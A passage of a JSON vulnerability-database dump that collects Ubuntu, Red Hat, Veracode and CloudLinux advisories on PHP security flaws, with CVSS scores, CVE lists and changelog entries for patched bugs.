"AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-18T02:58:45", "description": "## Releases\n\n * Ubuntu 17.04 \n * Ubuntu 16.04 ESM\n * Ubuntu 14.04 ESM\n\n## Packages\n\n * php5 \\- HTML-embedded scripting language interpreter\n * php7.0 \\- HTML-embedded scripting language interpreter\n\nIt was discovered that the PHP opcache created keys for files it cached \nbased on their filepath. A local attacker could possibly use this issue in \na shared hosting environment to obtain sensitive information. This issue \nonly affected Ubuntu 14.04 LTS. (CVE-2015-8994)\n\nIt was discovered that the PHP URL parser incorrectly handled certain URI \ncomponents. A remote attacker could possibly use this issue to bypass \nhostname-specific URL checks. This issue only affected Ubuntu 14.04 LTS. \n(CVE-2016-10397)\n\nIt was discovered that PHP incorrectly handled certain boolean parameters \nwhen unserializing data. A remote attacker could possibly use this issue to \ncause PHP to crash, resulting in a denial of service. This issue only \naffected Ubuntu 14.04 LTS. (CVE-2017-11143)\n\nSebastian Li, Wei Lei, Xie Xiaofei, and Liu Yang discovered that PHP \nincorrectly handled the OpenSSL sealing function. A remote attacker could \npossibly use this issue to cause PHP to crash, resulting in a denial of \nservice. (CVE-2017-11144)\n\nWei Lei and Liu Yang discovered that the PHP date extension incorrectly \nhandled memory. A remote attacker could possibly use this issue to disclose \nsensitive information from the server. (CVE-2017-11145)\n\nIt was discovered that PHP incorrectly handled certain PHAR archives. A \nremote attacker could use this issue to cause PHP to crash or disclose \nsensitive information. This issue only affected Ubuntu 14.04 LTS. \n(CVE-2017-11147)\n\nIt was discovered that PHP incorrectly handled locale length. A remote \nattacker could possibly use this issue to cause PHP to crash, resulting in \na denial of service. (CVE-2017-11362)\n\nWei Lei and Liu Yang discovered that PHP incorrectly handled parsing ini \nfiles. An attacker could possibly use this issue to cause PHP to crash, \nresulting in a denial of service. (CVE-2017-11628)\n\nIt was discovered that PHP mbstring incorrectly handled certain regular \nexpressions. A remote attacker could use this issue to cause PHP to crash, \nresulting in a denial of service, or possibly execute arbitrary code. \n(CVE-2017-9224, CVE-2017-9226, CVE-2017-9227, CVE-2017-9228, CVE-2017-9229)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-08-10T00:00:00", "type": "ubuntu", "title": "PHP vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8994", "CVE-2016-10397", "CVE-2017-11143", "CVE-2017-11144", "CVE-2017-11145", "CVE-2017-11147", "CVE-2017-11362", "CVE-2017-11628", "CVE-2017-9224", "CVE-2017-9226", "CVE-2017-9227", "CVE-2017-9228", "CVE-2017-9229"], "modified": "2017-08-10T00:00:00", "id": "USN-3382-1", "href": "https://ubuntu.com/security/notices/USN-3382-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhat": [{"lastseen": "2023-09-12T04:37:38", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server.\n\nThe following packages have been upgraded to a later upstream version: rh-php70-php (7.0.27). (BZ#1518843)\n\nSecurity Fix(es):\n\n* php: Heap overflow in mysqlnd when not receiving UNSIGNED_FLAG in BIT field (CVE-2016-7412)\n\n* php: Use after free in wddx_deserialize (CVE-2016-7413)\n\n* php: Out of bounds heap read when verifying signature of zip phar in phar_parse_zipfile (CVE-2016-7414)\n\n* php: Stack based buffer overflow in msgfmt_format_message (CVE-2016-7416)\n\n* php: Missing type check when unserializing SplArray (CVE-2016-7417)\n\n* php: Null pointer dereference in php_wddx_push_element (CVE-2016-7418)\n\n* php: Use-after-free vulnerability when resizing the 'properties' hash table of a serialized object (CVE-2016-7479)\n\n* php: Invalid read when wddx decodes empty boolean element (CVE-2016-9935)\n\n* php: Use After Free in unserialize() (CVE-2016-9936)\n\n* php: Wrong calculation in exif_convert_any_to_int function (CVE-2016-10158)\n\n* php: Integer overflow in phar_parse_pharfile (CVE-2016-10159)\n\n* php: Off-by-one error in phar_parse_pharfile when loading crafted phar archive (CVE-2016-10160)\n\n* php: Out-of-bounds heap read on unserialize in finish_nested_data() (CVE-2016-10161)\n\n* php: Null pointer dereference when unserializing PHP object (CVE-2016-10162)\n\n* gd: DoS vulnerability in gdImageCreateFromGd2Ctx() (CVE-2016-10167)\n\n* gd: Integer overflow in gd_io.c (CVE-2016-10168)\n\n* php: Use of uninitialized memory in unserialize() (CVE-2017-5340)\n\n* php: Buffer over-read from unitialized data in gdImageCreateFromGifCtx function (CVE-2017-7890)\n\n* oniguruma: Out-of-bounds stack read in match_at() during regular expression searching (CVE-2017-9224)\n\n* oniguruma: Heap buffer overflow in next_state_val() during regular expression compilation (CVE-2017-9226)\n\n* oniguruma: Out-of-bounds stack read in mbc_enc_len() during regular expression searching (CVE-2017-9227)\n\n* oniguruma: Out-of-bounds heap write in bitset_set_range() (CVE-2017-9228)\n\n* oniguruma: Invalid pointer dereference in left_adjust_char_head() (CVE-2017-9229)\n\n* php: Incorrect WDDX deserialization of boolean parameters leads to DoS (CVE-2017-11143)\n\n* php: Incorrect return value check of OpenSSL sealing function leads to crash (CVE-2017-11144)\n\n* php: Out-of-bounds read in phar_parse_pharfile (CVE-2017-11147)\n\n* php: Stack-based buffer over-read in msgfmt_parse_message function (CVE-2017-11362)\n\n* php: Stack based 1-byte buffer over-write in zend_ini_do_op() function Zend/zend_ini_parser.c (CVE-2017-11628)\n\n* php: heap use after free in ext/standard/var_unserializer.re (CVE-2017-12932)\n\n* php: heap use after free in ext/standard/var_unserializer.re (CVE-2017-12934)\n\n* php: reflected XSS in .phar 404 page (CVE-2018-5712)\n\n* php, gd: Stack overflow in gdImageFillToBorder on truecolor images (CVE-2016-9933)\n\n* php: NULL Pointer Dereference in WDDX Packet Deserialization with PDORow (CVE-2016-9934)\n\n* php: wddx_deserialize() heap out-of-bound read via php_parse_date() (CVE-2017-11145)\n\n* php: buffer over-read in finish_nested_data function (CVE-2017-12933)\n\n* php: Out-of-bound read in timelib_meridian() (CVE-2017-16642)\n\n* php: Denial of Service (DoS) via infinite loop in libgd gdImageCreateFromGifCtx function in ext/gd/libgd/gd_gif_in.c (CVE-2018-5711)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nAdditional Changes:\n\nFor details, see the Red Hat Software Collections 3.1 Release Notes linked from the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-05-03T03:21:11", "type": "redhat", "title": "(RHSA-2018:1296) Moderate: rh-php70-php security, bug fix, and enhancement update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10158", "CVE-2016-10159", "CVE-2016-10160", "CVE-2016-10161", "CVE-2016-10162", "CVE-2016-10167", "CVE-2016-10168", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418", "CVE-2016-7479", "CVE-2016-9933", "CVE-2016-9934", "CVE-2016-9935", "CVE-2016-9936", "CVE-2017-11143", "CVE-2017-11144", "CVE-2017-11145", "CVE-2017-11147", "CVE-2017-11362", "CVE-2017-11628", "CVE-2017-12932", "CVE-2017-12933", "CVE-2017-12934", "CVE-2017-16642", "CVE-2017-5340", "CVE-2017-7890", "CVE-2017-9224", "CVE-2017-9226", "CVE-2017-9227", "CVE-2017-9228", "CVE-2017-9229", "CVE-2018-5711", "CVE-2018-5712"], "modified": "2018-06-12T21:28:23", "id": "RHSA-2018:1296", "href": "https://access.redhat.com/errata/RHSA-2018:1296", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2023-04-18T13:19:30", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server. The following packages have been upgraded to a later upstream version: rh-php70-php (7.0.27). (BZ#1518843) Security Fix(es): * php: Heap overflow in mysqlnd when not receiving UNSIGNED_FLAG in BIT field (CVE-2016-7412) * php: Use after free in wddx_deserialize (CVE-2016-7413) * php: Out of bounds heap read when verifying signature of zip phar in phar_parse_zipfile (CVE-2016-7414) * php: Stack based buffer overflow in msgfmt_format_message (CVE-2016-7416) * php: Missing type check when unserializing SplArray (CVE-2016-7417) * php: Null pointer dereference in php_wddx_push_element (CVE-2016-7418) * php: Use-after-free vulnerability when resizing the 'properties' hash table of a serialized object (CVE-2016-7479) * php: Invalid read when wddx decodes empty boolean element (CVE-2016-9935) * php: Use After Free in unserialize() (CVE-2016-9936) * php: Wrong calculation in exif_convert_any_to_int function (CVE-2016-10158) * php: Integer overflow in phar_parse_pharfile (CVE-2016-10159) * php: Off-by-one error in phar_parse_pharfile when loading crafted phar archive (CVE-2016-10160) * php: Out-of-bounds heap read on unserialize in finish_nested_data() (CVE-2016-10161) * php: Null pointer dereference when unserializing PHP object (CVE-2016-10162) * gd: DoS vulnerability in gdImageCreateFromGd2Ctx() (CVE-2016-10167) * gd: Integer overflow in gd_io.c (CVE-2016-10168) * php: Use of uninitialized memory in unserialize() (CVE-2017-5340) * php: Buffer over-read from unitialized data in gdImageCreateFromGifCtx function (CVE-2017-7890) * oniguruma: Out-of-bounds stack read in match_at() during regular expression searching (CVE-2017-9224) * oniguruma: Heap buffer overflow in next_state_val() during regular expression compilation (CVE-2017-9226) * oniguruma: Out-of-bounds stack read in mbc_enc_len() during regular expression searching (CVE-2017-9227) * oniguruma: Out-of-bounds heap write in bitset_set_range() (CVE-2017-9228) * oniguruma: Invalid pointer dereference in left_adjust_char_head() (CVE-2017-9229) * php: Incorrect WDDX deserialization of boolean parameters leads to DoS (CVE-2017-11143) * php: Incorrect return value check of OpenSSL sealing function leads to crash (CVE-2017-11144) * php: Out-of-bounds read in phar_parse_pharfile (CVE-2017-11147) * php: Stack-based buffer over-read in msgfmt_parse_message function (CVE-2017-11362) * php: Stack based 1-byte buffer over-write in zend_ini_do_op() function Zend/zend_ini_parser.c (CVE-2017-11628) * php: heap use after free in ext/standard/var_unserializer.re (CVE-2017-12932) * php: heap use after free in ext/standard/var_unserializer.re (CVE-2017-12934) * php: reflected XSS in .phar 404 page (CVE-2018-5712) * php, gd: Stack overflow in gdImageFillToBorder on truecolor images (CVE-2016-9933) * php: NULL Pointer Dereference in WDDX Packet Deserialization with PDORow (CVE-2016-9934) * php: wddx_deserialize() heap out-of-bound read via php_parse_date() (CVE-2017-11145) * php: buffer over-read in finish_nested_data function (CVE-2017-12933) * php: Out-of-bound read in timelib_meridian() (CVE-2017-16642) * php: Denial of Service (DoS) via infinite loop in libgd gdImageCreateFromGifCtx function in ext/gd/libgd/gd_gif_in.c (CVE-2018-5711) For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section. Additional Changes: For details, see the Red Hat Software Collections 3.1 Release Notes linked from the References section.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-05-16T02:59:58", "type": "veracode", "title": "Use After Free", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-10158", "CVE-2016-10159", "CVE-2016-10160", "CVE-2016-10161", "CVE-2016-10162", "CVE-2016-10167", "CVE-2016-10168", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418", "CVE-2016-7479", "CVE-2016-9933", "CVE-2016-9934", "CVE-2016-9935", "CVE-2016-9936", "CVE-2017-11143", "CVE-2017-11144", "CVE-2017-11145", "CVE-2017-11147", "CVE-2017-11362", "CVE-2017-11628", "CVE-2017-12932", "CVE-2017-12933", "CVE-2017-12934", "CVE-2017-16642", "CVE-2017-5340", "CVE-2017-7890", "CVE-2017-9224", "CVE-2017-9226", "CVE-2017-9227", "CVE-2017-9228", "CVE-2017-9229", "CVE-2018-5711", "CVE-2018-5712"], "modified": "2022-04-19T18:16:39", "id": "VERACODE:19297", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-19297/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cloudlinux": [{"lastseen": "2023-10-02T17:15:20", "description": "- Fix bug #69720: Null pointer dereference in phar_get_fp_offset()\n- Fix bug #70728: Type Confusion Vulnerability in PHP_to_XMLRPC_worker()\n- Fix bug #70661: Use After Free Vulnerability in WDDX Packet Deserialization\n- Fix bug #70741: Session WDDX Packet Deserialization Type Confusion Vulnerability\n- Fix bug #71459: Integer overflow in iptcembed()\n- Fix bug #71039: exec functions ignore length but look for NULL termination\n- Fix bug #71354: Heap corruption in tar/zip/phar parser.\n- Fix bug #71391: NULL Pointer Dereference in phar_tar_setupmetadata()\n- Fix bug #71323: Output of stream_get_meta_data can be falsified by its input\n- Fix bug #71498: Out-of-Bound Read in phar_parse_zipfile()\n- Fix bug #71587: Use-After-Free / Double-Free in WDDX Deserialize\n- Fix bug #71860: Invalid memory write in phar on filename with \\0 in name\n- Fix bug #71798: Integer Overflow in php_raw_url_encode\n- Fix bug #72837: integer overflow in bzdecompress caused heap corruption\n- Fix bug #72681: PHP Session Data Injection Vulnerability\n- Fix bug #72807: integer overflow in curl_escape caused heap corruption\n- Fix bug #72838: Integer overflow lead to heap corruption in sql_regcase\n- Fix bug #72697: select_colors write out-of-bounds\n- Fix bug #72730: imagegammacorrect allows arbitrary write access\n- Fix bug #72836: integer overflow in base64_decode caused heap corruption\n- Fix bug #72848: integer overflow in quoted_printable_encode caused heap corruption\n- Fix bug #72849: integer overflow in urlencode caused heap corruption\n- Fix bug #72850: integer overflow in php_uuencode caused heap corruption\n- Fix bug #72771: ftps:// wrapper is vulnerable to protocol downgrade attack\n- Fix bug #72749: wddx_deserialize allows illegal memory access\n- Fix bug #72750: wddx_deserialize null dereference\n- Fix bug #72790: wddx_deserialize null dereference with invalid xml\n- Fix bug #72799: wddx_deserialize null dereference in php_wddx_pop_element\n- Fix bug #73189: Memcpy negative size parameter php_resolve_path\n- Fix bug #73150: missing NULL check in dom_document_save_html\n- Fix bug #73284: heap overflow in php_ereg_replace function\n- Fix bug #73218: stack-buffer-overflow through &quot;ResourceBundle&quot; methods\n- Fix bug #73208: integer overflow in imap_8bit caused heap corruption\n- Fix bug #73082: string length overflow in mb_encode_* function\n- Fix bug #73174: heap overflow in php_pcre_replace_impl\n- Fix bug #73276: crash in openssl_random_pseudo_bytes function\n- Fix bug #73275: crash in openssl_encrypt function\n- Fix bug #73017: memory corruption in wordwrap function\n- Fix bug #73240: Write out of bounds at number_format\n- Fix bug #73073: CachingIterator null dereference when convert to string\n- Fix bug #73293: NULL pointer dereference in SimpleXMLElement::asXML()\n- Fix bug #73356: crash in bzcompress function\n- Fix bug #72696: imagefilltoborder stackoverflow on truecolor images\n- Fix bug #73418: Integer Overflow in &quot;_php_imap_mail&quot; leads Heap Overflow\n- Fix bug #73144: Use-after-free in ArrayObject Deserialization\n- Fix bug #73192: parse_url return wrong hostname\n- Fix bug #73331: NULL Pointer Dereference in WDDX Packet Deserialization with PDORow\n- Fix bug #73452: Segfault (Regression for #69152)\n- Fix bug #73631: Invalid read when wddx decodes empty boolean element\n- Fix bug #67587: Redirection loop on nginx with FPM\n- Fix bug #71465: PHAR doesn't know about litespeed\n- Fix bug #73737: FPE when parsing a tag format\n- Fix bug #73868: Fix DOS vulnerability in gdImageCreateFromGd2Ctx()\n- Fix bug #73869: Signed Integer Overflow gd_io.c\n- Fix bug #73773: Seg fault when loading hostile phar\n- Fix bug #70436: Use After Free Vulnerability in unserialize()\n- Fix bug #74603: PHP INI Parsing Stack Buffer Overflow Vulnerability\n- Fix bug #72535: arcfour encryption stream filter crashes php\n- Fix bug #72434: ZipArchive class Use After Free Vulnerability in PHP's\n GC algorithm and unseria\n- Fix bug #72455: Heap Overflow due to integer overflows\n- Fix bug #74782: Reflected XSS in .phar 404 page\n- Fix bug #71335: Type Confusion in WDDX Packet Deserialization\n- Fix bug #76130: Heap Buffer Overflow (READ: 1786) in exif_iif_add_value\n- Fix bug #76249: stream filter convert.iconv leads to infinite loop on\n invalid sequence\n- Fix bug #76248: Malicious LDAP-Server Response causes Crash\n- Fix bug #76129: fix for CVE-2018-5712 may not be complete\n- Fix bug #75981: stack-buffer-overflow while parsing HTTP response\n- Fix bug #74385: Locale::parseLocale() broken with some arguments\n- Fix bug #76335: &quot;link(): Bad file descriptor&quot; with non-ASCII path\n- Fix bug #76383: array_map on $GLOBALS returns IS_INDIRECT\n- Fix bug #73342: Vulnerability in php-fpm by changing stdin to non-blocking\n- Fix bug #76505: array_merge_recursive() is duplicating sub-array keys\n- Fix bug #76532: Integer overflow and excessive memory usage in mb_strimwidth\n- Fix bug #76548: pg_fetch_result did not fetch the next row\n- Fix bug #76488: Memory leak when fetching a BLOB field\n- Fix bug #76665: SQLite3Stmt::bindValue() with SQLITE3_FLOAT doesn't juggle\n- Fix bug #75402: Possible Memory Leak using PDO::CURSOR_SCROLL option\n- Fix bug #76517: --with-gettext= causes configure to misjudges there is no getcwd\n- Fix bug #72443: Installing shared extensions: cp: cannot stat 'modules/*':\n No such file or dire\n- Fix bug #68175: RegexIterator pregFlags are NULL instead of 0\n- Fix bug #55146: iconv_mime_decode_headers() skips some headers\n- Fix bug #63839: iconv_mime_decode_headers function is skipping headers\n- Fix bug #60494: iconv_mime_decode does ignore special characters\n- Fix bug #68180: iconv_mime_decode can return extra characters in a header\n- Fix bug #73457: Wrong error message when fopen FTP wrapped fails to open\n data connection\n- Fix bug #74454: Wrong exception being thrown when using ReflectionMethod\n- Fix bug #74764: Bindto IPv6 works with file_get_contents but fails with\n stream_socket_client\n- Fix bug #75273: php_zlib_inflate_filter() may not update bytes_consumed\n- Fix bug #75696: posix_getgrnam fails to print details of group\n- Fix bug #76480: Use curl_multi_wait() so that timeouts are respected\n- Fix bug #76800: foreach inconsistent if array modified during loop\n- Fix bug #76886: Can't build xmlrpc with expat\n- Fix bug #76901: method_exists on SPL iterator passthrough method corrupts memory\n- Fix bug #77242: heap out of bounds read in xmlrpc_decode()\n- Fix bug #77247: heap buffer overflow in phar_detect_phar_fname_ext\n- Fix bug #77270: imagecolormatch Out Of Bounds Write on Heap\n- Fix bug #77370: Buffer overflow on mb regex functions - fetch_token\n- Fix bug #77380: Global out of bounds read in xmlrpc base64 code\n- Fix bug #77630: rename() across the device may allow unwanted access\n during processing\n- Fix bug #77494: Disabling class causes segfault on member access\n- Fix bug #77431: openFile() silently truncates after a null byte\n- Fix bug #51068: DirectoryIterator glob:// don't support current path\n relative queries\n- Fix bug #77396: Null Pointer Dereference in phar_create_or_parse_filename\n- Fix bug #77540: Invalid Read on exif_process_SOFn\n- Fix bug #77390: feof might hang on TLS streams in case of fragmented TLS records\n- Fix bug #77586: phar_tar_writeheaders_int() buffer overflow\n- Fix bug #77546: iptcembed broken function\n- Fix bug #77563: Uninitialized read in exif_process_IFD_in_MAKERNOTE\n- Fix bug #76557: heap-buffer-overflow (READ of size 48) while reading exif data\n- Fix bug #77024: SplFileObject::__toString() may return array\n- Fix bug #77945: Segmentation fault when constructing SoapClient with WSDL_CACHE_BOTH\n- Fix bug #77697: Crash on Big_Endian platform\n- Fix bug #77943: imageantialias($image, false); does not work\n- Fix bug #77944: Wrong meta pdo_type for bigint on LLP64\n- Fix bug #76717: var_export() does not create a parsable value for PHP_INT_MIN\n- Fix bug #77921: static.php.net doesn't work anymore\n- Fix bug #77934: php-fpm kill -USR2 not working\n- Fix bug #77700: Writing truecolor images as GIF ignores interlace flag\n- Fix bug #77765: FTP stream wrapper should set the directory as executable\n- Fix bug #50020: DateInterval:createDateFromString() silently fails\n- Fix bug #77742: bcpow() implementation related to gcc compiler optimization\n- Fix bug #77967: Bypassing open_basedir restrictions via file uris\n- Fix bug #77973: Uninitialized read in gdImageCreateFromXbm\n- Fix bug #77988: heap-buffer-overflow on php_jpg_get16\n- Fix bug #78192: SegFault when reuse statement after schema has changed\n- Fix bug #77124: FTP with SSL memory leak\n- Fix bug #78256: heap-buffer-overflow on exif_process_user_comment\n- Fix bug #78222: heap-buffer-overflow on exif_scan_thumbnail\n- Fix bug #77946: Bad cURL resources returned by curl_multi_info_read()\n- Fix bug #78333: Exif crash (bus error) due to wrong alignment and invalid cast\n- Fix bug #69100: Bus error from stream_copy_to_stream (file -&gt; SSL stream)\n with invalid length\n- Fix bug #76342: file_get_contents waits twice specified timeout\n- Fix bug #76859: stream_get_line skips data if used with data-generating filter\n- Fix bug #78579: mb_decode_numericentity: args number inconsistency\n- Fix bug #78910: Heap-buffer-overflow READ in exif\n- Fix bug #78878: Buffer underflow in bc_shift_addsub\n- Fix bug #78793: Use-after-free in exif parsing under memory sanitizer\n- Fix bug #78863: DirectoryIterator class silently truncates after a null byte\n- Fix bug #79099: OOB read in php_strip_tags_ex\n- Fix bug #79082: Files added to tar with Phar::buildFromIterator have\n all-access permissions\n- Fix bug #79329: get_headers() silently truncates after a null byte\n- Fix bug #79282: Use-of-uninitialized-value in exif\n- Fix bug #61597: SimpleXMLElement doesn't include both @attributes and\n textContent in properties\n- Fix bug #74940: DateTimeZone loose comparison always true until properties\n are initialized.\n- Fix bug #79296: ZipArchive::open fails on empty file (libzip 1.6.0)\n- Fix bug #79330: shell_exec() silently truncates after a null byte\n- Fix bug #79364: When copy empty array, next key is unspecified.\n- Fix bug #79396: DateTime hour incorrect during DST jump forward using setTime\n- Fix bug #79410: system() swallows last chunk if it is exactly 4095 bytes\n without newline\n- Fix bug #79424: php_zip_glob uses gl_pathc after call to globfree\n- Fix bug #79465: OOB Read in urldecode() (CVE-2020-7067)\n- Fix bug #78221: DOMNode::normalize() doesn't remove empty text nodes\n- Fix bug #78875: Long filenames cause OOM and temp files are not cleaned\n (CVE-2019-11048)\n- Fix bug #78876: Long variables in multipart/form-data cause OOM and temp\n files are not cleaned (CVE-2019-11048)\n- Fix bug #79514: Memory leaks while including unexistent file\n- Fix bug #79528: Different object of the same xml between 7.4.5 and 7.4.4\n- Fix bug #62890: default_socket_timeout=-1 causes connection to timeout\n- Fix bug #70362: Can't copy() large 'data://' with open_basedir\n- Fix bug #73527: Invalid memory access in php_filter_strip\n- Fix bug #74267: segfault with streams and invalid data\n- Fix bug #79787: mb_strimwidth does not trim string\n- Fix bug #79877: getimagesize function silently truncates after a null byte\n- Fix bug #68447: grapheme_extract take an extra trailing character\n- Fix bug #68825: Inconsistent exception in DirectoryIterator::getLinkTarget()\n- Fix bug #74145: wddx parsing empty boolean tag leads to SIGSEGV (CVE-2017-11143)\n- Fix bug #74651: negative-size-param (-1) in memcpy in zif_openssl_seal()\n (CVE-2017-11144)\n- Fix bug #74435: Buffer over-read into uninitialized memory (CVE-2017-7890)\n- Fix bug #73093: Unserialize Exception object can lead to infinite loop\n (CVE-2016-7478)\n- Fix bug #72520: Stack-based buffer overflow vulnerability in php_stream_zip_opener\n (CVE-2016-6297)\n- Fix bug #73825: Heap out of bounds read on unserialize in finish_nested_data()\n (CVE-2016-10161)\n- Fix bug #60491: Session module is adoptive (CVE-2011-4718)\n- Fix bug #69253: ZIP Integer Overflow leads to writing past heap boundary\n (CVE-2015-2331)\n- Fix bug #69418: CVE-2006-7243 fix regressions in 5.4+ (CVE-2015-4025)\n- Fix bug #68598: pcntl_exec() should not allow null char (CVE-2015-4026)\n- Fix bug #69207: move_uploaded_file allows nulls in path (CVE-2015-2348)\n- Fix bug #69218: potential remote code execution with apache 2.4 apache2handler\n (CVE-2015-3330)\n- Fix bug #69719: Incorrect handling of paths with NULs, related to bug 69353\n (CVE-2015-4598)\n- Fix bug #69353: Missing null byte checks for paths in various PHP extensions\n (CVE-2015-3411)\n- Fix bugs #70168, #70169, #70166, #70155: Use After Free Vulnerability in\n unserialize() with\n SplObjectStorage, SplDoublyLinkedList, SPLArrayObject, SPLArrayObject (CVE-2015-6831)\n- Fix bug #70019: Files extracted from archive may be placed outside of\n destination directory (CVE-2015-6833)\n- Fix bug #70388: SOAP serialize_function_call() type confusion / RCE (CVE-2015-6836)\n- Fix bug #69782: NULL pointer dereference (CVE-2015-6837, CVE-2015-6838)\n- Fix bug #70433: Uninitialized pointer in phar_make_dirstream when zip entry\n filename is \"/\" (CVE-2015-7804)\n- Fix bug #69923: Buffer overflow and stack smashing error in phar_fix_filepath\n (CVE-2015-5590)\n- Fix bug #71488: Stack overflow when decompressing tar archives (CVE-2016-2554)\n- Fix bug #72061: Out-of-bounds reads in zif_grapheme_stripos with negative offset\n (CVE-2016-4541, CVE-2016-4540)\n- Fix bug #72094: Out of bounds heap read access in exif header processing\n (CVE-2016-4542)\n- Fix bug #72093: bcpowmod accepts negative scale and corrupts _one_ definition\n (CVE-2016-4537)\n- Fix bug #71331: Uninitialized pointer in phar_make_dirstream() (CVE-2016-4343)\n- Fix bug #72241: get_icu_value_internal out-of-bounds read (CVE-2016-5093)\n- Fix bug #72135: Integer Overflow in php_html_entities() (CVE-2016-5094)\n- Fix bug #72114: Integer underflow / arbitrary null write in fread/gzread\n (CVE-2016-5096)\n- Fix bug #72339: Integer Overflow in _gd2GetHeader() resulting in heap overflow\n (CVE-2016-5766)\n- Fix bug #72340: Double Free Courruption in wddx_deserialize (CVE-2016-5772)\n- Fix bug #72613: Inadequate error handling in bzread() (CVE-2016-5399)\n- Fix bug #70480: php_url_parse_ex() buffer overflow read (CVE-2016-6288)\n- Fix bug #72513: Stack-based buffer overflow vulnerability in virtual_file_ex\n (CVE-2016-6289)\n- Fix bug #72562: Use After Free in unserialize() with Unexpected Session\n Deserialization (CVE-2016-6290)\n- Fix bug #72603: Out of bound read in exif_process_IFD_in_MAKERNOTE (CVE-2016-6291)\n- Fix bug #72533: locale_accept_from_http out-of-bounds access (CVE-2016-6294)\n- Fix bug #69975: PHP segfaults when accessing nvarchar(max) defined columns\n (CVE-2015-8879)\n- Fix bug #72606: heap-buffer-overflow (write) simplestring_addn simplestring.c\n (CVE-2016-6296)\n- Fix bug #72293: Heap overflow in mysqlnd related to BIT fields (CVE-2016-7412)\n- Fix bug #72860: wddx_deserialize use-after-free (CVE-2016-7413)\n- Fix bug #72928: Out of bound when verify signature of zip phar in phar_parse_zipfile\n (CVE-2016-7414)\n- Fix bug #73007: SEH buffer overflow msgfmt_format_message (CVE-2016-7416)\n- Fix bug #73029: Missing type check when unserializing SplArray (CVE-2016-7417)\n- Fix bug #73065: Out-Of-Bounds Read in php_wddx_push_element of wddx.c (CVE-2016-7418)\n- Fix bug #73280: Stack Buffer Overflow in GD dynamicGetbuf (CVE-2016-8670)\n- Fix bug #73764: Crash while loading hostile phar archive (CVE-2016-10159)\n- Fix bug #73768: Memory corruption when loading hostile phar (CVE-2016-10160)\n- Fix bug #72627: Memory Leakage In exif_process_IFD_in_TIFF (CVE-2016-7128)\n- Fix bug #70350: ZipArchive::extractTo allows for directory traversal when\n creating directories (CVE-2014-9767)\n- Fix bug #70081: SoapClient info leak / null pointer dereference via multiple\n type confusions (CVE-2015-8835)\n- Fix bug #70121: unserialize() could lead to unexpected methods execution / NULL\n pointer deref (CVE-2015-8876)\n- Fix bug #71906: AddressSanitizer: negative-size-param (-1) in mbfl_strcut\n 